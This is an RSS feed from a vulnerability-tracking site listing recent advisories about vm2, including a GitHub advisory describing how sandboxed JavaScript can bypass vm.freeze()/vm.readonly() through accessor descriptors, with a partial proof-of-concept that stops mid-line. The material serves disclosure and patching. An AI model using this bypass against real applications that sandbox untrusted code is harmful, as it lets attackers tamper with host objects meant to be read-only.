<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 18:37:57 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-373051</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-373051</link>
      <description>EUVD-2026-373051</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-373051</guid>
    </item>
    <item>
      <title>fkie_cve-2026-92949</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-92949</link>
      <description>&lt;p&gt;vm2 versions from 3.9.6 before 3.11.7 fail to properly restrict access to accessor properties on frozen objects, allowing sandboxed scripts to bypass vm.freeze() and vm.readonly() protections. Attackers can use Object.getOwnPropertyDescriptor() or __lookupSetter__() to extract and invoke host object setters directly, mutating properties the embedder explicitly marked read-only.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;vm2 versions from 3.9.6 before 3.11.7 fail to properly restrict access to accessor properties on frozen objects, allowing sandboxed scripts to bypass vm.freeze() and vm.readonly() protections. Attackers can use Object.getOwnPropertyDescriptor() or __lookupSetter__() to extract and invoke host object setters directly, mutating properties the embedder explicitly marked read-only.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-92949</guid>
    </item>
    <item>
      <title>GHSA-633r-hq9m-c4ff — vm2: vm.freeze()/vm.readonly() bypass via accessor descriptor</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-633r-hq9m-c4ff</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: vm2&lt;/p&gt;
&lt;p&gt;### Summary
Untrusted JavaScript running inside `new VM().run()` / `new NodeVM().run()` can bypass `vm.freeze()` / `vm.readonly()` and mutate a host object the embedder explicitly marked read-only - the documented contract is &amp;#34;prevent sandboxed scripts from adding, changing, or deleting properties&amp;#34;. If the frozen host object has an accessor (get/set) own-property, the sandbox can read the host setter back out via `Object.getOwnPropertyDescriptor()` and call it directly; the call lands in `BaseHandler.apply` which unwraps the readonly proxy to the raw host object and runs the host setter against it. No non-default `VM`/`NodeVM` options are required; the only precondition is that the embedder froze an object whose shape includes an accessor property. A second route to the same sink exists via `__lookupSetter__`.&lt;/p&gt;
&lt;p&gt;### PoC
```js
// poc.js
&amp;#39;use strict&amp;#39;;
const { VM } = require(&amp;#39;vm2&amp;#39;);&lt;/p&gt;
&lt;p&gt;let _level = &amp;#39;safe&amp;#39;;
const hostConfig = Object.defineProperty({}, &amp;#39;level&amp;#39;, {
  get() { return _level; },
  set(v) { _level = String(v); },
  enumerable: true, configurable: true,
});&lt;/p&gt;
&lt;p&gt;const vm = new VM();
vm.freeze(hostConfig, &amp;#39;cfg&amp;#39;);&lt;/p&gt;
&lt;p&gt;// Baseline - documented barriers hold:
vm.run(`cfg.level = &amp;#39;via-set&amp;#39;;`);
vm.run(`try { Object.defineProperty(cfg, &amp;#39;level&amp;#39;, {value: &amp;#39;via-dP&amp;#39;}); } catch (e) {}`);
console.log(&amp;#39;after [[Set]]/defineProperty:&amp;#39;, _level);   // → &amp;#34;safe&amp;#34;&lt;/p&gt;
&lt;p&gt;// Bypass - sandbox mutates host via accessor descriptor:
vm.run(`
  const d = Object.getOwnPropertyDescriptor(cfg, &amp;#39;level&amp;#39;);
  d.set.call(…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: vm2&lt;/p&gt;
&lt;p&gt;### Summary
Untrusted JavaScript running inside `new VM().run()` / `new NodeVM().run()` can bypass `vm.freeze()` / `vm.readonly()` and mutate a host object the embedder explicitly marked read-only - the documented contract is &amp;#34;prevent sandboxed scripts from adding, changing, or deleting properties&amp;#34;. If the frozen host object has an accessor (get/set) own-property, the sandbox can read the host setter back out via `Object.getOwnPropertyDescriptor()` and call it directly; the call lands in `BaseHandler.apply` which unwraps the readonly proxy to the raw host object and runs the host setter against it. No non-default `VM`/`NodeVM` options are required; the only precondition is that the embedder froze an object whose shape includes an accessor property. A second route to the same sink exists via `__lookupSetter__`.&lt;/p&gt;
&lt;p&gt;### PoC
```js
// poc.js
&amp;#39;use strict&amp;#39;;
const { VM } = require(&amp;#39;vm2&amp;#39;);&lt;/p&gt;
&lt;p&gt;let _level = &amp;#39;safe&amp;#39;;
const hostConfig = Object.defineProperty({}, &amp;#39;level&amp;#39;, {
  get() { return _level; },
  set(v) { _level = String(v); },
  enumerable: true, configurable: true,
});&lt;/p&gt;
&lt;p&gt;const vm = new VM();
vm.freeze(hostConfig, &amp;#39;cfg&amp;#39;);&lt;/p&gt;
&lt;p&gt;// Baseline - documented barriers hold:
vm.run(`cfg.level = &amp;#39;via-set&amp;#39;;`);
vm.run(`try { Object.defineProperty(cfg, &amp;#39;level&amp;#39;, {value: &amp;#39;via-dP&amp;#39;}); } catch (e) {}`);
console.log(&amp;#39;after [[Set]]/defineProperty:&amp;#39;, _level);   // → &amp;#34;safe&amp;#34;&lt;/p&gt;
&lt;p&gt;// Bypass - sandbox mutates host via accessor descriptor:
vm.run(`
  const d = Object.getOwnPropertyDescriptor(cfg, &amp;#39;level&amp;#39;);
  d.set.call(…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-633r-hq9m-c4ff</guid>
    </item>
    <item>
      <title>WID-SEC-W-2026-2997 — vm2: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2997</link>
      <description>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in vm2 ausnutzen, um Sicherheitsvorkehrungen zu umgehen, um Informationen offenzulegen, um Daten zu manipulieren, um einen Denial of Service Angriff durchzuführen und um beliebigen Programmcode auszuführen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in vm2 ausnutzen, um Sicherheitsvorkehrungen zu umgehen, um Informationen offenzulegen, um Daten zu manipulieren, um einen Denial of Service Angriff durchzuführen und um beliebigen Programmcode auszuführen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2997</guid>
    </item>
  </channel>
</rss>
